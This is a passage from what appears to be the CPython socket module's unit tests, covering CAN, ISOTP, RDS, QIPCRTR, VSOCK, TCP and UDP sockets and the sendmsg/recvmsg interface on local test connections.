socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
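    # Note: build_can_frame() and dissect_can_frame() are inverses for any
    # payload of at most 8 bytes, e.g. (illustrative values):
    #     cls.dissect_can_frame(cls.build_can_frame(0x123, b'\x01\x02'))
    #     == (0x123, 2, b'\x01\x02')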
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
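# For example (the concrete definitions appear near the end of this
# module), a UDP recvmsg() test case is assembled roughly like this:
#
#     class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
#                                  SendrecvmsgConnectionlessBase,
#                                  ThreadedSocketTestMixin, UDPTestBase):
#         pass
#
#     @requireAttrs(socket.socket, "recvmsg")
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass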
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
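        # For example, SendrecvmsgConnectionlessBase (defined below) sets
        # sendmsg_to_server_defaults to ([], [], 0, self.serv_addr), so a
        # bare sendmsgToServer([MSG]) ends up calling
        # cli_sock.sendmsg([MSG], [], 0, serv_addr).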
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
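        # For example, on a datagram socket (where MSG_TRUNC is added to
        # msg_flags_non_eor_indicator by SendrecvmsgDgramFlagsBase),
        # checkFlags(flags, eor=False) requires MSG_TRUNC to be set and
        # the common-unset flags (MSG_CTRUNC, MSG_OOB) to be unset,
        # unless overridden by checkset/checkunset or masked by ignore.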
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
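    # Note that recvmsg_into() returns (nbytes, ancdata, msg_flags,
    # address); the override below copies the received bytes back out of
    # the buffer so callers still see the (data, ancdata, msg_flags,
    # address) shape that recvmsg() returns.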
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
